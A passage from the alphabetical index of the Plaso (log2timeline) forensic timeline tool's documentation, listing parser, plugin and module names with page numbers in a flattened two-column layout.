(plaso.parsers.text_parser.PyparsingConstants index_table (plaso.parsers.chrome_cache.ChromeCacheIndexFileParserattribute), 446 attribute), 363 is_allocated (plaso.parsers.filestat.FileStatEventData info (plaso.parsers.winfirewall.WinFirewallEventData attribute), 372 attribute), 459 is_allocated (plaso.parsers.ntfs.NTFSFileStatEventData info_size (plaso.parsers.firefox_cache.FirefoxCacheEventData attribute), 405 attribute), 374 is_dirty (plaso.parsers.asl.ASLFileEventData at- inode (plaso.parsers.filestat.FileStatEventData attribute), 357 tribute), 372 is_friend (plaso.parsers.sqlite_plugins.tango_android.TangoAndroidContactEventData inode (plaso.parsers.mactime.MactimeEventData attribute), 300 attribute), 392 IsBound() (plaso.engine.zeromq_queue.ZeroMQQueue input_attribute (plaso.formatters.interface.BooleanEventFormatterHelpermethod), 152 attribute), 170 IsConnected() (plaso.engine.zeromq_queue.ZeroMQQueue input_attribute (plaso.formatters.interface.EnumerationEventFormatterHelpermethod), 152 attribute), 171 IsEmpty() (plaso.engine.plaso_queue.Queue method), input_attribute (plaso.formatters.interface.FlagsEventFormatterHelper137 attribute), 173 IsEmpty() (plaso.engine.zeromq_queue.ZeroMQQueue InSet (class in plaso.filters.filters), 162 method), 152 InstallHistoryPlugin (class in IsEquivalent() (plaso.containers.artifacts.OperatingSystemArtifact plaso.parsers.plist_plugins.install_history), method), 99 233 IsSupported() (plaso.engine.profilers.SampleFileProfiler INTEGER (plaso.parsers.iis.WinIISParser attribute), 380 class method), 146 INTEGER (plaso.parsers.text_parser.PyparsingConstants IsTextFormat() (plaso.lib.specification.FormatSpecification attribute), 446 method), 184 INTEGER_COLUMN_TYPES item_identifier (plaso.parsers.spotlight_storedb.SpotlightStoreMetadataItem (plaso.parsers.esedb_plugins.interface.ESEDBPlugin attribute), 433 attribute), 220 interface_luid (plaso.parsers.esedb_plugins.srum.SRUMNetworkConnectivityUsageEventDataJ attribute), 226 JavaIDXEventData (class in plaso.parsers.java_idx), interface_luid (plaso.parsers.esedb_plugins.srum.SRUMNetworkDataUsageEventData384 attribute), 227 JavaIDXParser (class in plaso.parsers.java_idx), 384 interrupt_reason (plaso.parsers.sqlite_plugins.chrome_history.ChromeHistoryFileDownloadedEventDatajob_id (plaso.parsers.cups_ipp.CupsIppEventData at- attribute), 253 tribute), 365 InvalidEvent, 180 job_name (plaso.parsers.cups_ipp.CupsIppEventData InvalidFilter, 180 attribute), 365 InvalidNumberOfOperands, 180

Index 555 Plaso (log2timeline), Release 20210606

JSONAttributeContainerSerializer (class in key_path (plaso.parsers.winreg_plugins.shutdown.ShutdownWindowsRegistryEventData plaso.serializer.json_serializer), 478 attribute), 341 JSONEventFormattingHelper (class in key_path (plaso.parsers.winreg_plugins.task_scheduler.TaskCacheEventData plaso.output.shared_json), 209 attribute), 342 JSONLineOutputModule (class in key_path (plaso.parsers.winreg_plugins.terminal_server.TerminalServerClientConnectionEventData plaso.output.json_line), 199 attribute), 343 JSONOutputModule (class in plaso.output.json_out), key_path (plaso.parsers.winreg_plugins.terminal_server.TerminalServerClientMRUEventData 199 attribute), 343 key_path (plaso.parsers.winreg_plugins.timezone.WindowsTimezoneSettingsEventData K attribute), 345 key (plaso.containers.plist_event.PlistTimeEventData at- key_path (plaso.parsers.winreg_plugins.typedurls.TypedURLsEventData tribute), 110 attribute), 345 key (plaso.parsers.chrome_cache.CacheEntry attribute), key_path (plaso.parsers.winreg_plugins.usb.WindowsUSBDeviceEventData 361 attribute), 346 key (plaso.parsers.spotlight_storedb.SpotlightStoreMetadataAttributekey_path (plaso.parsers.winreg_plugins.usbstor.USBStorEventData attribute), 432 attribute), 347 key_path (plaso.containers.windows_events.WindowsRegistryEventDatakey_path (plaso.parsers.winreg_plugins.userassist.UserAssistWindowsRegistryEventData attribute), 122 attribute), 349 key_path (plaso.parsers.winreg_plugins.appcompatcache.AppCompatCacheEventDatakey_path (plaso.parsers.winreg_plugins.windows_version.WindowsRegistryInstallationEventData attribute), 321 attribute), 349 key_path (plaso.parsers.winreg_plugins.bagmru.BagMRUEventDatakey_path (plaso.parsers.winreg_plugins.winlogon.WinlogonEventData attribute), 322 attribute), 350 key_path (plaso.parsers.winreg_plugins.ccleaner.CCleanerConfigurationEventDatakey_path (plaso.parsers.winreg_plugins.winrar.WinRARHistoryEventData attribute), 323 attribute), 351 key_path (plaso.parsers.winreg_plugins.ccleaner.CCleanerUpdateEventDatakey_paths (plaso.parsers.winreg_plugins.interface.BaseWindowsRegistryKeyFilter attribute), 324 property), 325 key_path (plaso.parsers.winreg_plugins.lfu.WindowsBootExecuteEventDatakey_paths (plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter attribute), 328 property), 325 key_path (plaso.parsers.winreg_plugins.lfu.WindowsBootVerificationEventDatakeyboard_layout (plaso.containers.artifacts.SystemConfigurationArtifact attribute), 328 attribute), 101 key_path (plaso.parsers.winreg_plugins.mountpoints.MountPoints2EventDataKeychainApplicationRecordEventData (class in attribute), 328 plaso.parsers.mac_keychain), 386 key_path (plaso.parsers.winreg_plugins.mrulist.MRUListEventDataKeychainDatabaseColumn (class in attribute), 330 plaso.parsers.mac_keychain), 387 key_path (plaso.parsers.winreg_plugins.mrulistex.MRUListExEventDataKeychainDatabaseTable (class in attribute), 331 plaso.parsers.mac_keychain), 387 key_path (plaso.parsers.winreg_plugins.msie_zones.MSIEZoneSettingsEventDataKeychainInternetRecordEventData (class in attribute), 333 plaso.parsers.mac_keychain), 387 key_path (plaso.parsers.winreg_plugins.network_drives.NetworkDriveEventDataKeychainParser (class in plaso.parsers.mac_keychain), attribute), 334 388 key_path (plaso.parsers.winreg_plugins.officemru.OfficeMRUListWindowsRegistryEventDatakeys (plaso.parsers.bencode_parser.BencodeFile prop- attribute), 336 erty), 359 key_path (plaso.parsers.winreg_plugins.officemru.OfficeMRUWindowsRegistryEventDataKikIOSMessageEventData (class in attribute), 336 plaso.parsers.sqlite_plugins.kik_ios), 276 key_path (plaso.parsers.winreg_plugins.outlook.OutlookSearchMRUEventDataKikIOSPlugin (class in attribute), 337 plaso.parsers.sqlite_plugins.kik_ios), 277 key_path (plaso.parsers.winreg_plugins.programscache.ExplorerProgramsCacheEventDatakind (plaso.parsers.spotlight_storedb.SpotlightStoreMetadataItemEventData attribute), 337 attribute), 433 key_path (plaso.parsers.winreg_plugins.run.RunKeyEventDataKMLOutputModule (class in plaso.output.kml), 200 attribute), 339 knowledge_base (plaso.engine.engine.BaseEngine at- key_path (plaso.parsers.winreg_plugins.sam_users.SAMUsersWindowsRegistryEventDatatribute), 127 attribute), 339 knowledge_base (plaso.preprocessors.mediator.PreprocessMediator key_path (plaso.parsers.winreg_plugins.services.WindowsRegistryServiceEventDataproperty), 475 attribute), 341 KnowledgeBase (class in plaso.engine.knowledge_base),

556 Index Plaso (log2timeline), Release 20210606

131 last_running_time (plaso.engine.processing_status.ProcessStatus KnowledgeBasePreprocessorPlugin (class in attribute), 139 plaso.preprocessors.interface), 470 last_saved_by (plaso.parsers.czip_plugins.oxml.OpenXMLEventData KnowledgeCRow() (plaso.parsers.sqlite_plugins.mac_knowledgec.MacKnowledgeCPluginattribute), 218 method), 284 last_time (plaso.parsers.sqlite_plugins.mac_document_versions.MacDocumentVersionsEventData known_folder_identifier attribute), 282 (plaso.parsers.winreg_plugins.programscache.ExplorerProgramsCacheEventDatalast_update_time (plaso.parsers.spotlight_storedb.SpotlightStoreMetadataItem attribute), 338 attribute), 433 KodiMyVideosPlugin (class in LaunchdPlugin (class in plaso.parsers.sqlite_plugins.kodi), 278 plaso.parsers.plist_plugins.launchd), 235 KodiVideoEventData (class in layer_id (plaso.parsers.docker.DockerJSONLayerEventData plaso.parsers.sqlite_plugins.kodi), 281 attribute), 368 leak_identifier (plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheLeakFilesEventData L attribute), 223 l2_profile_flags (plaso.parsers.esedb_plugins.srum.SRUMNetworkConnectivityUsageEventDataleft_operand (plaso.filters.filters.BinaryOperator at- attribute), 226 tribute), 160 l2_profile_flags (plaso.parsers.esedb_plugins.srum.SRUMNetworkDataUsageEventDataLessEqualOperator (class in plaso.filters.filters), 162 attribute), 227 LessThanOperator (class in plaso.filters.filters), 162 l2_profile_identifier level (plaso.parsers.asl.ASLEventData attribute), 356 (plaso.parsers.esedb_plugins.srum.SRUMNetworkConnectivityUsageEventDatalevel (plaso.parsers.mac_securityd.MacOSSecuritydLogEventData attribute), 226 attribute), 389 l2_profile_identifier license_expiration_dt (plaso.parsers.esedb_plugins.srum.SRUMNetworkDataUsageEventData(plaso.parsers.symantec.SymantecEventData attribute), 227 attribute), 438 L2TCSVEventFormattingHelper (class in license_feature_name plaso.output.l2t_csv), 200 (plaso.parsers.symantec.SymantecEventData L2TCSVFieldFormattingHelper (class in attribute), 438 plaso.output.l2t_csv), 201 license_feature_ver L2TCSVOutputModule (class in plaso.output.l2t_csv), (plaso.parsers.symantec.SymantecEventData 201 attribute), 438 L2TTLNOutputModule (class in plaso.output.tln), 209 license_fulfillment_id label (plaso.parsers.winreg_plugins.mountpoints.MountPoints2EventData(plaso.parsers.symantec.SymantecEventData attribute), 328 attribute), 438 labels (plaso.containers.events.EventTag attribute), 106 license_lifecycle (plaso.parsers.symantec.SymantecEventData language_code (plaso.parsers.winreg_plugins.amcache.AMCacheFileEventDataattribute), 438 attribute), 319 license_seats (plaso.parsers.symantec.SymantecEventData language_code (plaso.parsers.winreg_plugins.amcache.AMCacheProgramEventDataattribute), 438 attribute), 320 license_seats_delta LanguageArgumentsHelper (class in (plaso.parsers.symantec.SymantecEventData plaso.cli.helpers.language), 70 attribute), 438 last_activity_timestamp license_seats_total (plaso.analysis.mediator.AnalysisMediator (plaso.parsers.symantec.SymantecEventData attribute), 45 attribute), 439 last_activity_timestamp license_serial_num (plaso.parsers.symantec.SymantecEventData (plaso.engine.worker.EventExtractionWorker attribute), 439 attribute), 147 license_start_dt (plaso.parsers.symantec.SymantecEventData last_activity_timestamp attribute), 439 (plaso.parsers.mediator.ParserMediator LINE_GRAMMAR_BASE (plaso.parsers.sccm.SCCMParser attribute), 397 attribute), 424 last_name (plaso.parsers.sqlite_plugins.tango_android.TangoAndroidContactEventDataLINE_GRAMMAR_OFFSET attribute), 300 (plaso.parsers.sccm.SCCMParser attribute), last_processing_time (plaso.containers.tasks.Task 424 attribute), 117 line_number (plaso.parsers.google_logging.GoogleLogEventData attribute), 377

Index 557 Plaso (log2timeline), Release 20210606

LINE_STRUCTURES (plaso.parsers.apache_access.ApacheAccessParserLinuxDistributionPlugin (class in attribute), 354 plaso.preprocessors.linux), 471 LINE_STRUCTURES (plaso.parsers.apt_history.APTHistoryLogParserLinuxHostnamePlugin (class in attribute), 355 plaso.preprocessors.linux), 471 LINE_STRUCTURES (plaso.parsers.bash_history.BashHistoryParserLinuxIssueFilePlugin (class in attribute), 358 plaso.preprocessors.linux), 471 LINE_STRUCTURES (plaso.parsers.dpkg.DpkgParser at- LinuxStandardBaseReleasePlugin (class in tribute), 369 plaso.preprocessors.linux), 471 LINE_STRUCTURES (plaso.parsers.gdrive_synclog.GoogleDriveSyncLogParserLinuxSystemdOperatingSystemPlugin (class in attribute), 376 plaso.preprocessors.linux), 471 LINE_STRUCTURES (plaso.parsers.google_logging.GoogleLogParserLinuxTimeZonePlugin (class in attribute), 377 plaso.preprocessors.linux), 471 LINE_STRUCTURES (plaso.parsers.iis.WinIISParser at- LinuxUserAccountsPlugin (class in tribute), 380 plaso.preprocessors.linux), 471 LINE_STRUCTURES (plaso.parsers.mac_appfirewall.MacAppFirewallParserlist_analysis_plugins attribute), 385 (plaso.cli.analysis_tool.AnalysisTool attribute), LINE_STRUCTURES (plaso.parsers.mac_securityd.MacOSSecuritydLogParser82 attribute), 389 list_analysis_plugins LINE_STRUCTURES (plaso.parsers.mac_wifi.MacWifiLogParser (plaso.cli.psort_tool.PsortTool attribute), attribute), 391 87 LINE_STRUCTURES (plaso.parsers.popcontest.PopularityContestParserlist_hashers (plaso.cli.log2timeline_tool.Log2TimelineTool attribute), 414 attribute), 84 LINE_STRUCTURES (plaso.parsers.santa.SantaParser at- list_hashers (plaso.cli.psteal_tool.PstealTool attribute), 422 tribute), 88 LINE_STRUCTURES (plaso.parsers.sccm.SCCMParser at- list_language_identifiers tribute), 425 (plaso.cli.psort_tool.PsortTool attribute), LINE_STRUCTURES (plaso.parsers.selinux.SELinuxParser 87 attribute), 426 list_language_identifiers LINE_STRUCTURES (plaso.parsers.setupapi.SetupapiLogParser (plaso.cli.psteal_tool.PstealTool attribute), attribute), 427 88 LINE_STRUCTURES (plaso.parsers.skydrivelog.SkyDriveLogParserlist_output_modules (plaso.cli.psort_tool.PsortTool attribute), 429 attribute), 87 LINE_STRUCTURES (plaso.parsers.skydrivelog.SkyDriveOldLogParserlist_output_modules attribute), 430 (plaso.cli.psteal_tool.PstealTool attribute), LINE_STRUCTURES (plaso.parsers.sophos_av.SophosAVLogParser 88 attribute), 431 list_parsers_and_plugins LINE_STRUCTURES (plaso.parsers.syslog.SyslogParser (plaso.cli.log2timeline_tool.Log2TimelineTool attribute), 442 attribute), 84 LINE_STRUCTURES (plaso.parsers.text_parser.PyparsingSingleLineTextParserlist_parsers_and_plugins attribute), 447 (plaso.cli.psteal_tool.PstealTool attribute), LINE_STRUCTURES (plaso.parsers.vsftpd.VsftpdLogParser 88 attribute), 454 list_profilers (plaso.cli.log2timeline_tool.Log2TimelineTool LINE_STRUCTURES (plaso.parsers.winfirewall.WinFirewallParser attribute), 84 attribute), 459 list_profilers (plaso.cli.psort_tool.PsortTool at- LINE_STRUCTURES (plaso.parsers.xchatlog.XChatLogParser tribute), 87 attribute), 466 list_reports (plaso.cli.pinfo_tool.PinfoTool attribute), LINE_STRUCTURES (plaso.parsers.xchatscrollback.XChatScrollbackParser86 attribute), 467 list_sections (plaso.cli.pinfo_tool.PinfoTool at- LINE_STRUCTURES (plaso.parsers.zsh_extended_history.ZshExtendedHistoryParsertribute), 86 attribute), 468 list_signature_identifiers link_target (plaso.parsers.winlnk.WinLnkLinkEventData (plaso.cli.image_export_tool.ImageExportTool attribute), 462 attribute), 83 links_up_to_date (plaso.parsers.czip_plugins.oxml.OpenXMLEventDatalist_time_zones (plaso.cli.extraction_tool.ExtractionTool attribute), 218 attribute), 82

558 Index Plaso (log2timeline), Release 20210606

list_time_zones (plaso.cli.tool_options.OutputModuleOptions attribute), 414 attribute), 92 LOG_LINE (plaso.parsers.xchatscrollback.XChatScrollbackParser ListAnalysisPlugins() attribute), 467 (plaso.cli.tool_options.AnalysisPluginOptions LOG_LINE_6_0 (plaso.parsers.iis.WinIISParser at- method), 92 tribute), 380 ListHashers() (plaso.cli.tool_options.HashersOptions log_session_guid (plaso.parsers.symantec.SymantecEventData method), 92 attribute), 439 ListLanguageIdentifiers() log_source (plaso.containers.artifacts.WindowsEventLogProviderArtifact (plaso.cli.tool_options.OutputModuleOptions attribute), 103 method), 92 log_source (plaso.parsers.docker.DockerJSONContainerLogEventData ListOutputModules() attribute), 368 (plaso.cli.tool_options.OutputModuleOptions log_type (plaso.containers.artifacts.WindowsEventLogProviderArtifact method), 92 attribute), 103 ListParsersAndPlugins() logger (plaso.parsers.symantec.SymantecEventData at- (plaso.cli.extraction_tool.ExtractionTool tribute), 439 method), 83 login_count (plaso.parsers.winreg_plugins.sam_users.SAMUsersWindowsRegistryEventData ListProfilers() (plaso.cli.tool_options.ProfilingOptions attribute), 339 method), 92 login_domain (plaso.parsers.symantec.SymantecEventData ListReports() (plaso.cli.pinfo_tool.PinfoTool method), attribute), 439 86 long_name (plaso.containers.shell_item_events.ShellItemFileEntryEventData ListSections() (plaso.cli.pinfo_tool.PinfoTool attribute), 116 method), 86 lookup_hash (plaso.analysis.hash_tagging.HashAnalyzer ListSignatureIdentifiers() attribute), 41 (plaso.cli.image_export_tool.ImageExportTool LsQuarantineEventData (class in method), 83 plaso.parsers.sqlite_plugins.ls_quarantine), ListTimeZones() (plaso.cli.tools.CLITool method), 94 281 local_path (plaso.parsers.winlnk.WinLnkLinkEventData LsQuarantinePlugin (class in attribute), 462 plaso.parsers.sqlite_plugins.ls_quarantine), LOCAL_PATH_CACHE_QUERY 281 (plaso.parsers.sqlite_plugins.gdrive.GoogleDrivePlugin attribute), 268 M localized_name (plaso.containers.artifacts.TimeZoneArtifactmac_address (plaso.containers.windows_events.WindowsDistributedLinkTrackingEventData attribute), 102 attribute), 121 localized_name (plaso.containers.shell_item_events.ShellItemFileEntryEventDatamacaddr (plaso.parsers.symantec.SymantecEventData attribute), 116 attribute), 439 location (plaso.parsers.firefox_cache.FirefoxCacheEventDataMacAppFirewallLogEventData (class in attribute), 374 plaso.parsers.mac_appfirewall), 385 location (plaso.parsers.sqlite_plugins.twitter_android.TwitterAndroidContactEventDataMacAppFirewallParser (class in attribute), 304 plaso.parsers.mac_appfirewall), 385 location (plaso.parsers.sqlite_plugins.twitter_ios.TwitterIOSContactEventDataMacDocumentVersionsEventData (class in attribute), 308 plaso.parsers.sqlite_plugins.mac_document_versions), Log2TimelineTool (class in 282 plaso.cli.log2timeline_tool), 84 MacDocumentVersionsPlugin (class in log_filename (plaso.engine.configurations.ProcessingConfigurationplaso.parsers.sqlite_plugins.mac_document_versions), attribute), 125 283 log_level (plaso.parsers.gdrive_synclog.GoogleDriveSyncLogEventDataMacKeeperCacheEventData (class in attribute), 376 plaso.parsers.sqlite_plugins.mackeeper_cache), log_level (plaso.parsers.skydrivelog.SkyDriveLogEventData 289 attribute), 428 MacKeeperCachePlugin (class in log_level (plaso.parsers.skydrivelog.SkyDriveOldLogEventData plaso.parsers.sqlite_plugins.mackeeper_cache), attribute), 430 290 log_line (plaso.parsers.docker.DockerJSONContainerLogEventDataMacKnowledgeCApplicationEventData (class in attribute), 367 plaso.parsers.sqlite_plugins.mac_knowledgec), LOG_LINE (plaso.parsers.popcontest.PopularityContestParser 284

Index 559 Plaso (log2timeline), Release 20210606

MacKnowledgeCPlugin (class in attribute), 463 plaso.parsers.sqlite_plugins.mac_knowledgec), MAPPINGS_FILENAME (plaso.output.elastic.ElasticsearchOutputModule 284 attribute), 195 MacKnowledgeCSafariEventData (class in MAPPINGS_FILENAME (plaso.output.elastic_ts.ElasticTimesketchOutputModule plaso.parsers.sqlite_plugins.mac_knowledgec), attribute), 196 286 MAPPINGS_PATH (plaso.output.elastic_ts.ElasticTimesketchOutputModule MacNotesEventData (class in attribute), 196 plaso.parsers.sqlite_plugins.mac_notes), MarkdownTableView (class in plaso.cli.views), 96 286 MarkTaskAsMerging() MacNotesPlugin (class in (plaso.storage.redis.redis_store.RedisStore plaso.parsers.sqlite_plugins.mac_notes), class method), 485 286 Match() (plaso.filters.event_filter.EventObjectFilter MacNotificationCenterEventData (class in method), 154 plaso.parsers.sqlite_plugins.mac_notificationcenterMatch()), (plaso.parsers.interface.BaseFileEntryFilter 288 method), 381 MacNotificationCenterPlugin (class in Match() (plaso.parsers.interface.FileNameFileEntryFilter plaso.parsers.sqlite_plugins.mac_notificationcenter), method), 383 288 Match() (plaso.parsers.plist_plugins.interface.PlistPathFilter MacOSApplicationUsageEventData (class in method), 234 plaso.parsers.sqlite_plugins.appusage), 247 Match() (plaso.parsers.plist_plugins.interface.PrefixPlistPathFilter MacOSHostnamePlugin (class in method), 235 plaso.preprocessors.macos), 472 Match() (plaso.parsers.winreg_plugins.interface.BaseWindowsRegistryKeyFilter MacOSKeyboardLayoutPlugin (class in method), 325 plaso.preprocessors.macos), 472 Match() (plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter MacOSSecuritydLogEventData (class in method), 325 plaso.parsers.mac_securityd), 389 Match() (plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathPrefixFilter MacOSSecuritydLogParser (class in method), 326 plaso.parsers.mac_securityd), 389 Match() (plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathSuffixFilter MacOSSystemVersionPlugin (class in method), 326 plaso.preprocessors.macos), 472 Match() (plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyWithValuesFilter MacOSTCCEntry (class in method), 326 plaso.parsers.sqlite_plugins.macos_tcc), Match() (plaso.parsers.winreg_plugins.mrulist.MRUListStringRegistryKeyFilter 291 method), 330 MacOSTCCPlugin (class in Match() (plaso.parsers.winreg_plugins.mrulistex.MRUListExStringRegistryKeyFilter plaso.parsers.sqlite_plugins.macos_tcc), method), 332 291 Matches() (plaso.filters.file_entry.DateTimeFileEntryFilter MacOSTimeZonePlugin (class in method), 158 plaso.preprocessors.macos), 472 Matches() (plaso.filters.file_entry.ExtensionsFileEntryFilter MacOSUserAccountsPlugin (class in method), 158 plaso.preprocessors.macos), 472 Matches() (plaso.filters.file_entry.FileEntryFilter MactimeEventData (class in plaso.parsers.mactime), method), 158 392 Matches() (plaso.filters.file_entry.FileEntryFilterCollection MactimeParser (class in plaso.parsers.mactime), 393 method), 159 MacUserPlugin (class in Matches() (plaso.filters.file_entry.NamesFileEntryFilter plaso.parsers.plist_plugins.macuser), 236 method), 159 MacWifiLogEventData (class in Matches() (plaso.filters.file_entry.SignaturesFileEntryFilter plaso.parsers.mac_wifi), 390 method), 159 MacWifiLogParser (class in plaso.parsers.mac_wifi), Matches() (plaso.filters.filters.AndFilter method), 160 391 Matches() (plaso.filters.filters.BinaryOperator method), MakeRequestAndDecodeJSON() 160 (plaso.analysis.hash_tagging.HTTPHashAnalyzerMatches() (plaso.filters.filters.Filter method), 161 method), 40 Matches() (plaso.filters.filters.GenericBinaryOperator MalformedPresetError, 180 method), 161 mapped_files (plaso.parsers.winprefetch.WinPrefetchExecutionEventDataMatches() (plaso.filters.filters.IdentityFilter method),

560 Index Plaso (log2timeline), Release 20210606

162 attribute), 377 Matches() (plaso.filters.filters.Operator method), 162 message (plaso.parsers.mac_securityd.MacOSSecuritydLogEventData Matches() (plaso.filters.filters.OrFilter method), 163 attribute), 389 MAX_LINE_LENGTH (plaso.parsers.apache_access.ApacheAccessParserMESSAGE_GRAMMARS (plaso.parsers.syslog_plugins.cron.CronSyslogPlugin attribute), 354 attribute), 316 MAX_LINE_LENGTH (plaso.parsers.apt_history.APTHistoryLogParserMESSAGE_GRAMMARS (plaso.parsers.syslog_plugins.interface.SyslogPlugin attribute), 355 attribute), 316 MAX_LINE_LENGTH (plaso.parsers.iis.WinIISParser at- MESSAGE_GRAMMARS (plaso.parsers.syslog_plugins.ssh.SSHSyslogPlugin tribute), 381 attribute), 318 MAX_LINE_LENGTH (plaso.parsers.santa.SantaParser at- message_id (plaso.parsers.asl.ASLEventData attribute), tribute), 423 356 MAX_LINE_LENGTH (plaso.parsers.sophos_av.SophosAVLogParsermessage_identifier (plaso.parsers.sqlite_plugins.tango_android.TangoAndroidMessageEventData attribute), 431 attribute), 301 MAX_LINE_LENGTH (plaso.parsers.text_parser.PyparsingSingleLineTextParsermessage_identifier (plaso.parsers.winevt.WinEvtRecordEventData attribute), 447 attribute), 455 MAXIMUM_CONSECUTIVE_LINE_FAILURES message_identifier (plaso.parsers.winevtx.WinEvtxRecordEventData (plaso.parsers.text_parser.PyparsingSingleLineTextParser attribute), 457 attribute), 447 message_status (plaso.parsers.sqlite_plugins.hangouts_messages.HangoutsMessageData MAXIMUM_READ_BUFFER_SIZE attribute), 270 (plaso.lib.line_reader_file.BinaryLineReader message_status (plaso.parsers.sqlite_plugins.kik_ios.KikIOSMessageEventData attribute), 182 attribute), 276 MaximumRecursionDepth, 180 message_type (plaso.parsers.sqlite_plugins.hangouts_messages.HangoutsMessageData McafeeAccessProtectionParser (class in attribute), 270 plaso.parsers.mcafeeav), 396 message_type (plaso.parsers.sqlite_plugins.imessage.IMessageEventData McafeeAVEventData (class in plaso.parsers.mcafeeav), attribute), 273 395 message_type (plaso.parsers.sqlite_plugins.kik_ios.KikIOSMessageEventData md5 (plaso.parsers.mactime.MactimeEventData at- attribute), 276 tribute), 392 mime_type (plaso.parsers.sqlite_plugins.firefox_downloads.FirefoxDownloadEventData md5_hash (plaso.containers.events.EventDataStream at- attribute), 260 tribute), 105 MIN_COLUMNS (plaso.parsers.networkminer.NetworkMinerParser MD5Hasher (class in plaso.analyzers.hashers.md5), 57 attribute), 404 MemoryProfiler (class in plaso.engine.profilers), 145 MIN_COLUMNS (plaso.parsers.trendmicroav.OfficeScanVirusDetectionParser merge_priority (plaso.containers.tasks.Task attribute), attribute), 448 117 MIN_COLUMNS (plaso.parsers.trendmicroav.OfficeScanWebReputationParser MergeAttributeContainers() attribute), 449 (plaso.storage.merge_reader.StorageMergeReaderMIN_COLUMNS (plaso.parsers.trendmicroav.TrendMicroBaseParser method), 498 attribute), 450 message (plaso.containers.warnings.AnalysisWarning mode (plaso.parsers.santa.SantaExecutionEventData at- attribute), 120 tribute), 420 message (plaso.containers.warnings.ExtractionWarning mode_as_string (plaso.parsers.mactime.MactimeEventData attribute), 120 attribute), 392 message (plaso.containers.warnings.PreprocessingWarningMODE_LINEAR (plaso.cli.status_view.StatusView at- attribute), 121 tribute), 89 message (plaso.containers.warnings.RecoveryWarning MODE_WINDOW (plaso.cli.status_view.StatusView at- attribute), 121 tribute), 89 message (plaso.parsers.asl.ASLEventData attribute), model (plaso.parsers.santa.SantaMountEventData 356 attribute), 421 message (plaso.parsers.chrome_preferences.ChromeExtensionsAutoupdaterEventDatamodule attribute), 364 plaso, 505 message (plaso.parsers.chrome_preferences.ChromePreferencesClearHistoryEventDataplaso.analysis, 54 attribute), 364 plaso.analysis.browser_search, 39 message (plaso.parsers.gdrive_synclog.GoogleDriveSyncLogEventDataplaso.analysis.chrome_extension, 40 attribute), 376 plaso.analysis.definitions, 40 message (plaso.parsers.google_logging.GoogleLogEventData plaso.analysis.hash_tagging, 40

Index 561 Plaso (log2timeline), Release 20210606

plaso.analysis.interface, 43 plaso.cli.helpers.temporary_directory, 77 plaso.analysis.logger, 44 plaso.cli.helpers.text_prepend, 77 plaso.analysis.manager, 44 plaso.cli.helpers.vfs_backend, 78 plaso.analysis.mediator, 45 plaso.cli.helpers.viper_analysis, 78 plaso.analysis.nsrlsvr, 46 plaso.cli.helpers.virustotal_analysis, 79 plaso.analysis.sessionize, 48 plaso.cli.helpers.windows_services_analysis, plaso.analysis.tagging, 48 80 plaso.analysis.test_memory, 49 plaso.cli.helpers.workers, 80 plaso.analysis.unique_domains_visited, 49 plaso.cli.helpers.xlsx_output, 81 plaso.analysis.viper, 50 plaso.cli.helpers.yara_rules, 81 plaso.analysis.virustotal, 51 plaso.cli.image_export_tool, 83 plaso.analysis.windows_services, 52 plaso.cli.log2timeline_tool, 84 plaso.analyzers, 62 plaso.cli.logger, 85 plaso.analyzers.hashers, 59 plaso.cli.pinfo_tool, 85 plaso.analyzers.hashers.entropy, 55 plaso.cli.psort_tool, 87 plaso.analyzers.hashers.interface, 55 plaso.cli.psteal_tool, 88 plaso.analyzers.hashers.manager, 56 plaso.cli.status_view, 89 plaso.analyzers.hashers.md5, 57 plaso.cli.storage_media_tool, 90 plaso.analyzers.hashers.sha1, 58 plaso.cli.time_slices, 91 plaso.analyzers.hashers.sha256, 58 plaso.cli.tool_options, 92 plaso.analyzers.hashing_analyzer, 59 plaso.cli.tools, 93 plaso.analyzers.interface, 59 plaso.cli.views, 95 plaso.analyzers.logger, 60 plaso.containers, 122 plaso.analyzers.manager, 60 plaso.containers.analyzer_result, 97 plaso.analyzers.yara_analyzer, 61 plaso.containers.artifacts, 98 plaso.cli, 97 plaso.containers.event_sources, 104 plaso.cli.analysis_tool, 82 plaso.containers.events, 104 plaso.cli.extraction_tool, 82 plaso.containers.interface, 108 plaso.cli.helpers, 82 plaso.containers.manager, 109 plaso.cli.helpers.analysis_plugins, 62 plaso.containers.plist_event, 110 plaso.cli.helpers.artifact_definitions, plaso.containers.reports, 111 63 plaso.containers.sessions, 111 plaso.cli.helpers.artifact_filters, 63 plaso.containers.shell_item_events, 116 plaso.cli.helpers.data_location, 64 plaso.containers.storage_media, 117 plaso.cli.helpers.date_filters, 64 plaso.containers.tasks, 117 plaso.cli.helpers.dynamic_output, 65 plaso.containers.time_events, 119 plaso.cli.helpers.elastic_output, 66 plaso.containers.warnings, 120 plaso.cli.helpers.elastic_ts_output, 66 plaso.containers.windows_events, 121 plaso.cli.helpers.event_filters, 67 plaso.dependencies, 505 plaso.cli.helpers.extraction, 67 plaso.engine, 154 plaso.cli.helpers.filter_file, 68 plaso.engine.artifact_filters, 122 plaso.cli.helpers.hashers, 69 plaso.engine.configurations, 123 plaso.cli.helpers.interface, 69 plaso.engine.engine, 127 plaso.cli.helpers.language, 70 plaso.engine.extractors, 129 plaso.cli.helpers.manager, 70 plaso.engine.filter_file, 130 plaso.cli.helpers.nsrlsvr_analysis, 71 plaso.engine.filters_helper, 130 plaso.cli.helpers.output_modules, 72 plaso.engine.knowledge_base, 131 plaso.cli.helpers.parsers, 73 plaso.engine.logger, 135 plaso.cli.helpers.process_resources, 73 plaso.engine.path_filters, 135 plaso.cli.helpers.profiling, 74 plaso.engine.path_helper, 136 plaso.cli.helpers.sessionize_analysis, 74 plaso.engine.plaso_queue, 137 plaso.cli.helpers.status_view, 75 plaso.engine.process_info, 138 plaso.cli.helpers.storage_format, 76 plaso.engine.processing_status, 138 plaso.cli.helpers.tagging_analysis, 76 plaso.engine.profilers, 145

562 Index Plaso (log2timeline), Release 20210606

